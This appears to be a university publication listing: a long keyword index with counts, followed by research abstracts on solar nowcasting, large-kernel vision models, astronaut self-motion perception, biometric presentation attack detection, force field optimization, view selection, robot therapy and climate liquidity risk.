- Space exploration (1)
- Sparse matrix format (1)
- Spatio-Temporal (1)
- Spatiotemporality (1)
- Spectral Analysis (1)
- Spectral Clustering (1)
- Spectroscopy (1)
- Spectrum occupancy (1)
- Spectrum optimization (1)
- Speech Act Theory (1)
- Spherical Treadmill (1)
- Spherical treadmill (1)
- Split Axis (1)
- Standards (1)
- Star Trek (1)
- State machines (1)
- Stereoscopic Rendering (1)
- Stereoscopic rendering (1)
- Story Element (1)
- Stream cipher (1)
- Streaming (1)
- Stress Management (1)
- Supervised classification (1)
- Supervised learning (1)
- Supply chains (1)
- Surrogate Modelling (1)
- Surrogate models (1)
- Surrogate-assistance (1)
- Swim Stroke Analysis (1)
- Switched power electronic systems (1)
- Symmetry detector (1)
- Synthetic perception (1)
- System health monitoring (1)
- SystemVerilog (1)
- TEL-AML1 (1)
- TLS (1)
- TP53 (1)
- Tactile Feedback (1)
- Tactile feedback (1)
- Tag (1)
- Task Frame Formalism (1)
- Task allocation (1)
- Tautomers (1)
- Teaching Quality Pact (1)
- Telecommunication network reliability (1)
- Telecommunication network routing (1)
- Teleconferencing system (1)
- Template Attacks (1)
- Temporal constraints (1)
- Temporally-weighted (1)
- Terrain rendering (1)
- Testing (1)
- Text detection (1)
- Text recognition (1)
- Textureless objects (1)
- Therapy (1)
- Throughput (1)
- Tiled displays (1)
- Tiled-display walls (1)
- Time extended assignment (1)
- Time measurement (1)
- Timing analysis (1)
- Timing channel (1)
- ToF Camera (1)
- Token (1)
- Touchscreen interaction (1)
- Touchscreens (1)
- Toyota HSR (1)
- Trace algebra (1)
- Traceability (1)
- Tracking (1)
- Tracking by detection (1)
- Traffic Simulations (1)
- Traffic sign detection (1)
- Traffic sign recognition (1)
- Training Model (1)
- Training Optimization (1)
- Transfer Learning (1)
- Transfer learning (1)
- Transformations between various description formats (1)
- Transforms (1)
- Translocation (1)
- Transparency (1)
- Transponder (1)
- Travel Techniques (1)
- Treatment of discontinuities and singularities in ordinary differential equations (1)
- Tree Stumps (1)
- Two-Ray (1)
- Two-factor Authentication (1)
- U-NII band (1)
- UAV teleoperation (1)
- UGV (1)
- UI design (1)
- USAR (1)
- Ultrasonic array (1)
- Uncertainty (1)
- Uncertainty Estimation (1)
- Uncertainty Quantification (1)
- Underwater (1)
- Unidirectional thermoplastic composites (1)
- Unifying theories (1)
- Unknown parameter degradation (1)
- Unmanned Aerial Vehicle (UAV) (1)
- User Roles (1)
- User Study (1)
- User engagement (1)
- User experience design (1)
- User interface (1)
- User interfaces (1)
- User-Centered Approach (1)
- User-Centered Design (1)
- User-Computer Interface (1)
- User-centered privacy engineering (1)
- VR system design (1)
- VR-based systems (1)
- Vacuum Cleaner (1)
- Valproic acid (1)
- Variability Management (1)
- Variability Resolution (1)
- Variational Autoencoder (1)
- Vector Intrinsics (1)
- Vector Units (1)
- Vehicle-2-Vehicle Communication (1)
- Vehicle-to- Vehicle Communication (V2V) (1)
- Vehicle-to-Infrastructure Communication (1)
- Vehicle-to-Infrastructure Communication (V2I) (1)
- Vehicle-to-Vehicle Com- munication (1)
- Vehicular Ad hoc Networks (VANETs) (1)
- Verilog (1)
- Vibrational microspectroscopy (1)
- Video surveillance (1)
- View selection (1)
- Virtual Agents (1)
- Virtual Environment (1)
- Virtual Environments (1)
- Virtual Memory Palace (1)
- Virtual attention (1)
- Virtual environments (1)
- Visual Cueing (1)
- Visual Discrimination (1)
- Visual perception (1)
- Visualization design and evaluation methods (1)
- Visualization systems and tools (1)
- Visuelle Wahrnehmung (1)
- Vulnerable Groups (1)
- V˙CO2 prediction (1)
- V˙O2 prediction (1)
- WDS (1)
- WWW (1)
- Wang-tiles (1)
- Web (1)
- Web components (1)
- WfMS (1)
- Whole body motion (1)
- Wi-Fi (1)
- WiAFirm (1)
- WiFi-based Long Distance (WiLD) (1)
- WiFi-based Long Distance networks (1)
- Wireless Backhaul Network (1)
- Wissensarbeit (1)
- Wissensintensive Geschäftsprozesse (1)
- Workflow (1)
- Workflow Management (1)
- XGBoost (1)
- XML (1)
- XML Signature (1)
- XML Signature Wrapping (1)
- XML schema for bond graph models (1)
- XNA Game Studio (1)
- XSLT (1)
- Xeon Phi knights landing (1)
- YANG (1)
- YOLO (1)
- Young adults (1)
- ZWave (1)
- ZigBee (1)
- ZombieLoad (1)
- accelerometer (1)
- activation function (1)
- acute (1)
- adaptive agents (1)
- adaptive binarization (1)
- adaptive filters (1)
- adaptive trigger (1)
- affective computing (1)
- allopurinol (1)
- ambulatory monitoring (1)
- analog/digital signal processing (1)
- analyses (1)
- analytical redundancy relation residuals (1)
- analytical redundancy relations (1)
- anomaly detection (1)
- antibody deficiency (1)
- apoptosis (1)
- architectural distortion (1)
- artifacts (1)
- asset transfer (1)
- assistive robotics (1)
- assistive robots (1)
- atomic instructions (1)
- atomic operation (1)
- audio-tactile feedback (1)
- augmented, and virtual realities (1)
- authentication (1)
- authoring tools (1)
- autoimmune lymphoproliferative syndrome (1)
- autoinflammatory disease (1)
- automated 3D scanning (1)
- automatic measurement validation (1)
- automatic music generation (1)
- automation (1)
- automation of sample processing (1)
- autonomous driving (1)
- averaged bond graph models (1)
- back-of-device interaction (1)
- background motion (1)
- bagging (1)
- bass-shaker (1)
- benchmarking (1)
- bicausal diagnostic Bond Graphs (1)
- bicycle (1)
- binary classification (1)
- bioinformatics (1)
- biorder (1)
- bloat (1)
- body-centric cues (1)
- bond graph (1)
- bond graphs (1)
- bond-graph-based physical systems modelling (1)
- bootstrapping (1)
- brain computer interfaces (1)
- breast cancer (1)
- brightfield microscopy (1)
- building automation (1)
- built environment (1)
- bus load (1)
- caching (1)
- camera (1)
- camera-based person detection (1)
- can bus (1)
- cancer (1)
- cellular automata (1)
- change process (1)
- chemical sensors (1)
- childhood (1)
- childhood cancer syndrome (1)
- client-side component model (1)
- closed kinematic chain (1)
- co-located collaboration (1)
- cognitive radio (1)
- collaboration (1)
- collaborative learning (1)
- collision (1)
- colorimetry (1)
- commuting (1)
- compensation (1)
- complete basis set limit (1)
- component analyses (1)
- component based (1)
- computational causalities (1)
- computational logic (1)
- computer games (1)
- computer-supported collaborative work (1)
- concrete plate (1)
- conformations (1)
- constitutional mismatch repair syndrome (1)
- constraint relaxation (1)
- constructive process deviance (1)
- control (1)
- control architectures (1)
- controller design (1)
- convex optimization (1)
- cooperative path planning (1)
- correlation (1)
- crawling (1)
- cross-disciplinary (1)
- cryptanalytic attacks (1)
- cryptocurrency (1)
- cuSPARSE (1)
- curved shell (1)
- cyanide (1)
- cybersickness (1)
- data analysis (1)
- data glove (1)
- data logging (1)
- data visualisation (1)
- database (1)
- database systems (1)
- decision tree learning (1)
- degraded DNA (1)
- denial-of-service (1)
- dependable robots (1)
- depth perception (1)
- design process (1)
- designing air flow (1)
- detection (1)
- developer centered security (1)
- differential algebraic equation systems (1)
- digital co-creation (1)
- digital platform ecosystem (1)
- digital storytelling (1)
- dimensionality reduction (1)
- direct feedback (1)
- directed hypergraphs (1)
- directional antennas (1)
- disabled people (1)
- displacement measurement (1)
- distance perception (1)
- distributed authoring (1)
- distributed processing (1)
- domain adaptation (1)
- driving (1)
- drone video quality (1)
- drugs (1)
- dynamics (1)
- e-Research (1)
- e-learning course structure (1)
- eavesdropping (1)
- echo state network (1)
- eco-driving (1)
- electrochemical sensor (1)
- elite sports (1)
- embedded collaborative learning (1)
- embodied interfaces (1)
- emotion computing (1)
- employee privacy (1)
- energy (1)
- energy efficient transportation (1)
- energy optimal driving (1)
- energy saving (1)
- entwicklerzentrierte Sicherheit (1)
- erbliche Krebssyndrome (1)
- estimation (1)
- evaluation as a mean to communication (1)
- evolution strategies (1)
- evolutionary illumination (1)
- evolved neural network controller (1)
- evolving look ahead controllers (1)
- execution (1)
- explainable AI (1)
- explainable gesture recognition (1)
- exploration (1)
- extraction-linked bias (1)
- extreme learning machine (1)
- eye movement (1)
- eye tracking (1)
- facial expression recognition (1)
- factor analysis (1)
- failure prognostic (1)
- fault indicators (1)
- fault scenarios (1)
- fault handling (1)
- faults in robotics (1)
- feature discovery (1)
- feature selection (1)
- felt obligations (1)
- fiducial marker (1)
- fingerprint (1)
- finite element method (1)
- fitness-fatigue model (1)
- fixed causalities generation of analytical redundancy relations (1)
- flying (1)
- force field (1)
- force sensing (1)
- forensic (1)
- forms of mathematical models (1)
- fpga (1)
- frequency (1)
- fuel (1)
- full-body interface (1)
- fuzzy logic (1)
- game engine (1)
- gamification (1)
- gaming (1)
- gaze (1)
- general plate theory (1)
- generation of ARRs (1)
- generative design (1)
- genes (1)
- genetic neutrality (1)
- genetic testing (1)
- genetics (1)
- genetische Testung (1)
- global illumination (1)
- graphene oxide powder (1)
- graphene oxide powders (1)
- graphs (1)
- grasp motions (1)
- grasping (1)
- gravito-inertial force (1)
- hand guidance (1)
- haptic feedback (1)
- haptic interfaces (1)
- head down bed rest (1)
- heart rate control (1)
- heart rate modeling (1)
- heart rate prediction (1)
- heat shrink tubes (1)
- heavy metal (1)
- heterogeneous networks (1)
- heuristics (1)
- hierarchical clustering (1)
- high degree of diagnostic coverage and reliability (1)
- high diagnostic coverage and reliability (1)
- high dynamic range resistance readout (1)
- high speed railway vehicle (1)
- high-throughput DNA sequencing (1)
- high-throughput sequencing (1)
- higher education (1)
- holography (1)
- hospital environment (1)
- hospital-acquired infections (1)
- human computer interaction (1)
- human microbiome (1)
- human-centred design (1)
- human-centric lighting (1)
- human-robot collaboration (1)
- hybrid dynamics solver (1)
- hybrid robot skill representation (1)
- hybrid system (1)
- hybrid system models (1)
- hydrocarbon (1)
- hypermedia applications (1)
- iOER (1)
- ideation (1)
- image captioning (1)
- image sequence processing (1)
- immersion (1)
- immersive systems (1)
- immunodeficiency (1)
- indicators calculation (1)
- information display methods (1)
- information flows (1)
- informational self-determination (1)
- infrared pattern (1)
- innovative work behavior (1)
- instance segmentation (1)
- intelligent pedestrian counter (1)
- interaction techniques (1)
- interactive computer graphics (1)
- interactive distributed rendering (1)
- intercultural learning (1)
- interference (1)
- international (1)
- international teams (1)
- intervention mechanisms (1)
- inverse model (1)
- ion-selective electrodes (1)
- irregularity amplitude (1)
- isolation (1)
- issue tracker (1)
- knowledge engineering (1)
- knowledge graphs (1)
- knowledge-management (1)
- large-high-resolution displays (1)
- latent class analysis (1)
- leaning, self-motion perception (1)
- leaning-based interfaces (1)
- learning object repositories (1)
- learning traces (1)
- learning-based fault detection and diagnosis (1)
- leukemia (1)
- light curtains (1)
- linguistic variable (1)
- linguistic variables (1)
- link calibration (1)
- lipid (1)
- load control (1)
- local optimization (1)
- locomotion (1)
- locomotion interface (1)
- long short-term memory (1)
- long-distance 802.11 (1)
- long-distance modeling (1)
- low-cost air sensor (1)
- lymphocytic (1)
- manipulation (1)
- massive parallel sequencing (1)
- mathematical modeling (1)
- measurement (1)
- mebendazole (1)
- mechatronic systems (1)
- medical training (1)
- mental models (1)
- mesoscopic agents (1)
- micro-benchmarks (1)
- microbial community structure (1)
- microbial ecology (1)
- microbiome (1)
- microbiome analyses (1)
- microcomputers (1)
- microcontroller (1)
- mininig software repositories (1)
- mixed reality (1)
- mobile applications (1)
- mobile manipulators (1)
- mobile or handheld device (1)
- mobile projection (1)
- mobile robots (1)
- mobile web (1)
- mobility assistance system (1)
- modal superposition (1)
- mode switching LTI models (1)
- mode-dependent implicit state space model (1)
- mode-switching linear time-invariant models (1)
- model exchange (1)
- modeling (1)
- modelling methodology (1)
- modular web (1)
- momentary frequency (1)
- mood (1)
- morphological operator (1)
- motion capture (1)
- motion control (1)
- motion cueing (1)
- motion platform (1)
- motion sickness (1)
- motion trajectory enhancement (1)
- mp2 (1)
- multi causal strain (1)
- multi robot systems (1)
- multi-channel power sourcing (1)
- multi-layer display (1)
- multi-objective optimization (1)
- multi-screen visualization environments (1)
- multi-solution optimization (1)
- multi-user VR (1)
- multibody system (1)
- multibody systems (1)
- multibond graphs (1)
- multidisciplinary (1)
- multimodal optimization (1)
- multiple Xbox 360 (1)
- multiple computer systems (1)
- multiresolution analysis (1)
- multiscale parameterization (1)
- multisensory (1)
- multisensory interface (1)
- music analysis (1)
- mutation (1)
- nano-composite (1)
- natural language processing (1)
- natural user interface (1)
- navigational search (1)
- near infrared (1)
- near-infrared (1)
- neural networks (1)
- neuro-cognitive performance (1)
- neuroevolution (1)
- neutral buoyancy (1)
- next generation sequencing (1)
- noise suppression (1)
- nomadic text entry (1)
- non-linear projection (1)
- nonlinear storytelling (1)
- numerical computation of residuals (1)
- object identification (1)
- object-oriented modelling (1)
- object-oriented physical systems modelling (1)
- objective function (1)
- octane (1)
- open educational resources (OERs) (1)
- operation mode independent causalities (1)
- optical character recognition (1)
- optical coherence tomography (1)
- optical flow (1)
- optical safeguard sensor (1)
- optical tracking (1)
- optical triangulation (1)
- optimal control (1)
- optimal control problem (1)
- optimized geometries (1)
- opto-electronic protective device (1)
- optoelectronic (1)
- parallel BFS (1)
- parallel difference visualization (1)
- parallel work queue (1)
- parameter estimation (1)
- parameter sensitivities of residuals of ARRs (1)
- parameter sensitivity of residuals (1)
- parametric (1)
- payment protocol (1)
- pedestrian counting system (1)
- pedestrian movements (1)
- pen interaction (1)
- perceived quality (1)
- perception of upright (1)
- performance modeling (1)
- performance optimizations (1)
- performance prediction (1)
- peripheral visual field (1)
- person and object detection and recognition (1)
- phenomenological approaches (1)
- phenotypic diversity (1)
- phenotypic feature (1)
- phenotypic niching (1)
- photometry (1)
- physical model immersive (1)
- physiological monitoring (1)
- plasma-enhanced CVD (PECVD) (deposition) (1)
- porous material (1)
- posture analysis (1)
- power spectral density (1)
- pre-optimization (1)
- predictive maintenance (1)
- prefrontal cortex (1)
- prehensile motions (1)
- preprocessing (1)
- presentation attack detection (1)
- presentation attack detection (PAD) (1)
- prioritizable ranking (1)
- privacy at work (1)
- privacy by design (1)
- process (1)
- prognosis (1)
- project-based learning (1)
- projection (1)
- projection based systems (1)
- propan-2-ol (1)
- property-based testing for robots (1)
- prototype theory (1)
- proxemics (1)
- pseudo-random number generator (1)
- psychophysics (1)
- qualitative reasoning (1)
- quality-diversity (1)
- quantitative model-based fault detection (1)
- quantum mechanics (1)
- question answering (1)
- radio-frequency identification (RFID) systems (1)
- rapid prototyping tool (1)
- ray tracing (1)
- rds encoding (1)
- recurrent neural network function (1)
- reference dataset (1)
- refined beam theory (1)
- region of interest (1)
- regression (1)
- regression testing (1)
- remaining useful life (1)
- remote diagnosis (1)
- remote sensing (1)
- remote-controlled robots (1)
- rendering (computer graphics) (1)
- repeated trend projection (1)
- representation (1)
- representation learning (1)
- requirements (1)
- requirements analysis (1)
- requirements management (1)
- residual bond graph sinks (1)
- resource utilization (1)
- reuse of indicators (1)
- ride comfort (1)
- road (1)
- robot action diagnosability (1)
- robot behaviour model (1)
- robot component monitoring (1)
- robot context awareness (1)
- robot control (1)
- robot control architecture (1)
- robot failure diagnosis (1)
- robot kinematics (1)
- robot personalisation (1)
- robot skill execution failures (1)
- robot skill generalisation (1)
- robotic arm (1)
- robotic black box (1)
- robotic evaluation (1)
- robots (1)
- routing (1)
- rules (1)
- run-time adaptation (1)
- rural areas (1)
- scalability (1)
- scene element representation (1)
- scene-segmentation (1)
- scenes (1)
- screens (display) (1)
- security APIs (1)
- security and privacy literacy (1)
- see-through display (1)
- see-through head-mounted displays (1)
- self-configuration (1)
- self-management (1)
- semantic image seg-mentation (1)
- semantic mapping (1)
- semi-continuous locomotion (1)
- semi-supervised learning (1)
- sensemaking (1)
- sensor data acquisition (1)
- sensor data transmission (1)
- sensor fusion (1)
- sensor resilience (1)
- sensor-based fault detection and diagnosis (1)
- sensory perception (1)
- server processors (1)
- service activities (1)
- shared memory (1)
- shell theory (1)
- short tandem repeat (1)
- short-term memory (1)
- signal processing algorithm (1)
- simulation of fault scenarios (1)
- simulation-based robot testing (1)
- simulator (1)
- situation awareness (1)
- skill execution models (1)
- skin detection (1)
- slip detection (1)
- slope based signature (1)
- small molecule (1)
- software (1)
- software development (1)
- software engineering (1)
- software testing (1)
- software-based feedback agents (1)
- software-defined networking (1)
- space flight analog (1)
- spatial augmented reality (1)
- spatial orientation (1)
- spectral rendering (1)
- spectrum scan (1)
- spectrum sensing (1)
- speech recognition (1)
- spinal posture (1)
- static friction (1)
- stereoscopic vision (1)
- stiffeners (1)
- story authoring (1)
- strain (1)
- stress (1)
- stress detection (1)
- subjective visual vertical (1)
- submillimeter precision (1)
- support vector machine (1)
- surface textures (1)
- surface topography (1)
- surrogate assisted phenotypic niching (1)
- surrogate models (1)
- switched three-phase power inverter (1)
- synthetic dataset (1)
- system mode independent bond graph representation (1)
- system modes (1)
- tactile sensing (1)
- task models (1)
- task planning (1)
- taxonomie (1)
- teaching (1)
- technology mapping (1)
- teleoperation (1)
- teleportation (1)
- telepresence (1)
- telomeres (1)
- territoriality (1)
- test case reduction (1)
- text detection (1)
- text entry in motion (1)
- text localization (1)
- textual model description languages (1)
- thread mapping (1)
- tiled displays (1)
- time series analysis (1)
- time series processing (1)
- tools for education (1)
- touchscreen (1)
- trace model (1)
- trace-based system (1)
- track irregularity (1)
- traffic sign detection (1)
- traffic sign localization (1)
- training monitoring (1)
- training performance relationship (1)
- transparency-enhancing technologies (1)
- travel techniques (1)
- true random number generator (1)
- tumor microenvironment (1)
- tumor-infiltrating immune cells (1)
- ultrasonic sensor (1)
- un-manned aerial vehicle (1)
- uncertainties (1)
- unexpected situations (1)
- unique bond graph representation for all modes of operation (1)
- unmanned ground vehicle (1)
- unrolling (1)
- unstructured data (1)
- unsupervised learning (1)
- usability (1)
- usable privacy controls (1)
- usable secure email (1)
- usage contexts (1)
- usage data analysis (1)
- user documentation (1)
- user engagement (1)
- user input (1)
- user interaction (1)
- user interface design (1)
- user modelling (1)
- vector units (1)
- verification and validation of robot action execution (1)
- vestibular system (1)
- view management (1)
- virtual environment framework (1)
- virtual locomotion (1)
- virtual or soft keyboard (1)
- visual attention (1)
- visual quality control (1)
- visualisation (1)
- visualization (1)
- visuohaptic feedback (1)
- walking (1)
- water dimer (1)
- wavelet (1)
- wearable sensor (1)
- wearable sensors (1)
- web (1)
- web components (1)
- web services (1)
- web technology (1)
- website (1)
- weight perception (1)
- weighting factors (1)
- welfare technology (1)
- whole-body interface (1)
- whole-exome sequencing (1)
- wind nuisance (1)
- wind nuisance threshold (1)
- wireless communication (1)
- wireless mesh networks (1)
- wireless performance (1)
- wmSDN (1)
- workday breaks (1)
- workspace awareness (1)
- xorshift-generator (1)
- youBot (1)
- zooming interface (1)
- zooming interfaces (1)
- Wavenet (1)
This work proposes a novel approach for probabilistic end-to-end all-sky imager-based nowcasting with horizons of up to 30 min using an ImageNet pre-trained deep neural network. The method follows a two-stage approach: first, a backbone model is trained to estimate the irradiance from all-sky imager (ASI) images; the model is then extended and retrained on image and parameter sequences for forecasting. An open-access data set is used for training and evaluation. We investigated the impact of simultaneously considering global horizontal (GHI), direct normal (DNI), and diffuse horizontal irradiance (DHI) on training time and forecast performance, as well as the effect of adding parameters describing the irradiance variability proposed in the literature. The backbone model estimates current GHI with an RMSE and MAE of 58.06 and 29.33 W m⁻², respectively. When extended for forecasting, the model achieves an overall positive skill score of up to 18.6 % compared to a smart persistence forecast. Minor modifications to the deterministic backbone and forecasting models enable the architecture to output an asymmetrical probability distribution and reduce training time while leading to similar errors for the backbone models. Investigating the impact of variability parameters shows that they reduce training time but have no significant impact on GHI forecasting performance for either deterministic or probabilistic forecasting, while simultaneously forecasting GHI, DNI, and DHI reduces the forecast performance.
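The skill score reported above compares the model's error against a reference forecast (here, smart persistence). A minimal sketch of that metric, with hypothetical GHI values in W/m² as placeholder data:

```python
import numpy as np

def rmse(pred, obs):
    """Root-mean-square error between forecasts and observations."""
    pred, obs = np.asarray(pred, float), np.asarray(obs, float)
    return float(np.sqrt(np.mean((pred - obs) ** 2)))

def skill_score(model_pred, reference_pred, obs):
    """Forecast skill score: 1 - RMSE_model / RMSE_reference.
    Positive values mean the model beats the reference forecast."""
    return 1.0 - rmse(model_pred, obs) / rmse(reference_pred, obs)

# Toy example; these numbers are illustrative, not from the paper.
obs = [500, 520, 480, 450]
persistence = [510, 540, 500, 480]   # stand-in for a smart persistence forecast
model = [505, 525, 485, 460]

print(skill_score(model, persistence, obs))  # > 0: model outperforms persistence
```

A score of 0 means no improvement over the reference; 1 would be a perfect forecast.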
In vision tasks, a larger effective receptive field (ERF) is associated with better performance. While attention natively supports global context, convolution requires multiple stacked layers and a hierarchical structure for large context. In this work, we extend Hyena, a convolution-based attention replacement, from causal sequences to the non-causal two-dimensional image space. We scale the Hyena convolution kernels beyond the feature map size up to 191$\times$191 to maximize the ERF while maintaining sub-quadratic complexity in the number of pixels. We integrate our two-dimensional Hyena, HyenaPixel, and bidirectional Hyena into the MetaFormer framework. For image categorization, HyenaPixel and bidirectional Hyena achieve a competitive ImageNet-1k top-1 accuracy of 83.0% and 83.5%, respectively, while outperforming other large-kernel networks. Combining HyenaPixel with attention further increases accuracy to 83.6%. We attribute the success of attention to the lack of spatial bias in later stages and support this finding with bidirectional Hyena.
Is It Really You Who Forgot the Password? When Account Recovery Meets Risk-Based Authentication
(2024)
Self-motion perception is a multi-sensory process that involves visual, vestibular, and other cues. When perception of self-motion is induced using only visual motion, vestibular cues indicate that the body remains stationary, which may bias an observer’s perception. When lowering the precision of the vestibular cue by, for example, lying down or adapting to microgravity, these biases may decrease, accompanied by a decrease in precision. To test this hypothesis, we used a move-to-target task in virtual reality. Astronauts and Earth-based controls were shown a target at a range of simulated distances. After the target disappeared, forward self-motion was induced by optic flow. Participants indicated when they thought they had arrived at the target’s previously seen location. Astronauts completed the task on Earth (supine and sitting upright) prior to space travel, early and late in space, and early and late after landing. Controls completed the experiment on Earth using a similar regime, with a supine posture used to simulate being in space. While variability was similar across all conditions, the supine posture led to significantly higher gains (target distance/perceived travel distance) than the sitting posture for the astronauts pre-flight and early post-flight but not late post-flight. No difference was detected between the astronauts’ performance on Earth and onboard the ISS, indicating that judgments of traveled distance were largely unaffected by long-term exposure to microgravity. Overall, this constitutes mixed evidence as to whether non-visual cues to travel distance are integrated with relevant visual cues when self-motion is simulated using optic flow alone.
Selection Performance and Reliability of Eye and Head Gaze Tracking Under Varying Light Conditions
(2024)
Due to their user-friendliness and reliability, biometric systems have taken a central role in everyday digital identity management for all kinds of private, financial and governmental applications with increasing security requirements. A central security aspect of unsupervised biometric authentication systems is the presentation attack detection (PAD) mechanism, which defines the robustness to fake or altered biometric features. Artifacts like photos, artificial fingers, face masks and fake iris contact lenses are a general security threat for all biometric modalities. The Biometric Evaluation Center of the Institute of Safety and Security Research (ISF) at the University of Applied Sciences Bonn-Rhein-Sieg has specialized in the development of a near-infrared (NIR)-based contact-less detection technology that can distinguish between human skin and most artifact materials. This technology is highly adaptable and has already been successfully integrated into fingerprint scanners, face recognition devices and hand vein scanners. In this work, we introduce a cutting-edge, miniaturized near-infrared presentation attack detection (NIR-PAD) device. It includes an innovative signal processing chain and an integrated distance measurement feature to boost both reliability and resilience. We detail the device’s modular configuration and conceptual decisions, highlighting its suitability as a versatile platform for sensor fusion and seamless integration into future biometric systems. This paper elucidates the technological foundations and conceptual framework of the NIR-PAD reference platform, alongside an exploration of its potential applications and prospective enhancements.
Force field (FF) based molecular modeling is an often used method to investigate and study structural and dynamic properties of (bio-)chemical substances and systems. When such a system is modeled or refined, the force field parameters need to be adjusted. This force field parameter optimization can be a tedious task and is always a trade-off in terms of errors regarding the targeted properties. To better control the balance of various properties’ errors, in this study we introduce weighting factors for the optimization objectives. Different weighting strategies are compared to fine-tune the balance between bulk-phase density and relative conformational energies (RCE), using n-octane as a representative system. Additionally, a non-linear projection of the individual property-specific parts of the optimized loss function is deployed to further improve the balance between them. The results show that the overall error is reduced. One interesting outcome is a large variety in the resulting optimized force field parameters (FFParams) and corresponding errors, suggesting that the optimization landscape is multi-modal and very dependent on the weighting factor setup. We conclude that adjusting the weighting factors can be a very important feature to lower the overall error in the FF optimization procedure, giving researchers the possibility to fine-tune their FFs.
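The weighting scheme described above can be sketched as a simple combined objective. This is an illustrative sketch, not the authors' implementation: the function and argument names are hypothetical, and the non-linear projection is shown here as an optional per-term transform (e.g. `log1p`) that damps whichever property error currently dominates.

```python
import math

def weighted_ff_loss(density_err, rce_err, w_density=1.0, w_rce=1.0,
                     projection=None):
    """Combine property-specific errors into one optimization objective.

    density_err, rce_err: normalized errors for bulk-phase density and
    relative conformational energies (illustrative placeholders).
    projection: optional non-linear map applied to each term to further
    balance their contributions.
    """
    if projection is not None:
        density_err = projection(density_err)
        rce_err = projection(rce_err)
    return w_density * density_err + w_rce * rce_err

# Weighting density accuracy twice as strongly as RCE accuracy:
loss = weighted_ff_loss(0.8, 0.3, w_density=2.0, w_rce=1.0,
                        projection=math.log1p)
```

Tuning `w_density` and `w_rce` shifts the trade-off between the two targeted properties, which is the fine-tuning lever the abstract refers to.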
While humans can effortlessly pick a view from multiple streams, automatically choosing the best view is a challenge. Selecting the best view from multi-camera streams raises the question of which objective metrics should be considered, and existing work on view selection lacks consensus on this point: the literature describes diverse possible metrics, and strategies that are purely information-theoretic, instructional-design-based, or aesthetics-motivated each fail to incorporate all approaches. In this work, we propose a strategy that combines information-theoretic and instructional-design-based objective metrics to select the best view from a set of views. Traditionally, information-theoretic measures have been used to quantify the goodness of a view, for instance in 3D rendering. We adapted one such measure, the viewpoint entropy, to real-world 2D images, and additionally incorporated similarity penalization to obtain a more accurate estimate of a view's entropy, which serves as one of the metrics for best-view selection. Since the choice of the best view is domain-dependent, we chose demonstration-based training scenarios as our use case; a limitation of these scenarios is that they do not include collaborative training and feature only a single trainer. To incorporate instructional-design considerations, we included the visibility of the trainer's body pose, face, face while instructing, and hands as metrics; to incorporate domain knowledge, we included the visibility of predetermined regions as another metric. All of these metrics feed into a parameterized view recommendation approach for demonstration-based training. An online study using recorded multi-camera video streams from a simulation environment was used to validate the metrics, and the responses from that study were used to optimize the view recommendation performance, reaching a normalized discounted cumulative gain (NDCG) of 0.912, which indicates good agreement with user choices.
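The NDCG value cited above measures how well a produced ranking matches an ideal one. A minimal sketch of the standard definition (the relevance values below are hypothetical, not the study's data):

```python
import math

def dcg(relevances):
    """Discounted cumulative gain of a ranked list of relevance scores."""
    return sum(rel / math.log2(i + 2) for i, rel in enumerate(relevances))

def ndcg(ranked_relevances):
    """Normalized DCG: DCG of the produced ranking divided by the DCG of
    the ideal (descending) ordering; 1.0 means a perfect ranking."""
    ideal = dcg(sorted(ranked_relevances, reverse=True))
    return dcg(ranked_relevances) / ideal if ideal > 0 else 0.0

# Hypothetical user relevance ratings, listed in the order the system
# ranked the candidate views:
print(ndcg([3, 2, 3, 0, 1]))
```

An NDCG of 0.912 therefore means the recommended view ordering was close to the ordering users themselves preferred.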
During robot-assisted therapy, a robot typically needs to be partially or fully controlled by therapists, for instance using a Wizard-of-Oz protocol; this makes therapeutic sessions tedious to conduct, as therapists cannot fully focus on the interaction with the person under therapy. In this work, we develop a learning-based behaviour model that can be used to increase the autonomy of a robot’s decision-making process. We investigate reinforcement learning as a model training technique and compare different reward functions that consider a user’s engagement and activity performance. We also analyse various strategies that aim to make the learning process more tractable, namely i) behaviour model training with a learned user model, ii) policy transfer between user groups, and iii) policy learning from expert feedback. We demonstrate that policy transfer can significantly speed up the policy learning process, although the reward function has an important effect on the actions that a robot can choose. Although the main focus of this paper is the personalisation pipeline itself, we further evaluate the learned behaviour models in a small-scale real-world feasibility study in which six users participated in a sequence learning game with an assistive robot. The results of this study seem to suggest that learning from guidance may result in the most adequate policies in terms of increasing the engagement and game performance of users, but a large-scale user study is needed to verify the validity of that observation.
Although climate-induced liquidity risks can cause significant disruptions and instabilities in the financial sector, they are frequently overlooked in current debates and policy discussions. This paper proposes a macro-financial agent-based integrated assessment model to investigate the transmission channels of climate risks to financial instability and to study the emergence of liquidity crises through interbank market dynamics. Our simulations show that the financial system could experience serious funding and market liquidity shortages due to climate-induced liquidity crises. Our investigation contributes to the understanding of the impact of climate-induced liquidity crises, and of possible solutions to them, beyond the issue of asset stranding related to transition risks usually considered in existing studies.
A PM2.5 concentration prediction framework with vehicle tracking system: From cause to effect
(2023)
Representing 3D surfaces as level sets of continuous functions over ℝ³ is the common denominator of neural implicit representations, which recently enabled remarkable progress in geometric deep learning and computer vision tasks. In order to represent 3D motion within this framework, it is often assumed (either explicitly or implicitly) that the transformations which a surface may undergo are homeomorphic: this is not necessarily true, for instance, in the case of fluid dynamics. In order to represent more general classes of deformations, we propose to apply this theoretical framework as regularizers for the optimization of simple 4D implicit functions (such as signed distance fields). We show that our representation is capable of capturing both homeomorphic and topology-changing deformations, while also defining correspondences over the continuously-reconstructed surfaces.
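To make the notion of a topology-changing deformation of a level set concrete, here is a toy time-dependent signed distance field, unrelated to the paper's learned representation: the union of two spheres whose centers drift apart, so the zero level set splits from one component into two, which no homeomorphism can express.

```python
import math

def sphere_sdf(p, center, radius):
    """Signed distance from point p to a sphere surface (negative inside)."""
    return math.dist(p, center) - radius

def scene_sdf(p, t):
    """Time-dependent SDF: two spheres of radius 0.5 whose centers move
    apart as t grows. Their union (pointwise min) starts as one merged
    blob and splits into two components -- a topology change."""
    d = 0.4 + 1.2 * t   # half-distance between centers (illustrative)
    left = sphere_sdf(p, (-d, 0.0, 0.0), 0.5)
    right = sphere_sdf(p, (d, 0.0, 0.0), 0.5)
    return min(left, right)

# At t=0 the origin is inside the merged blob (negative SDF);
# at t=1 the spheres have separated and the origin lies outside (positive).
print(scene_sdf((0.0, 0.0, 0.0), 0.0), scene_sdf((0.0, 0.0, 0.0), 1.0))
```

The surface at any time t is the set of points where `scene_sdf(p, t) == 0`; tracking it across t is exactly the 4D implicit-function setting the abstract describes.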
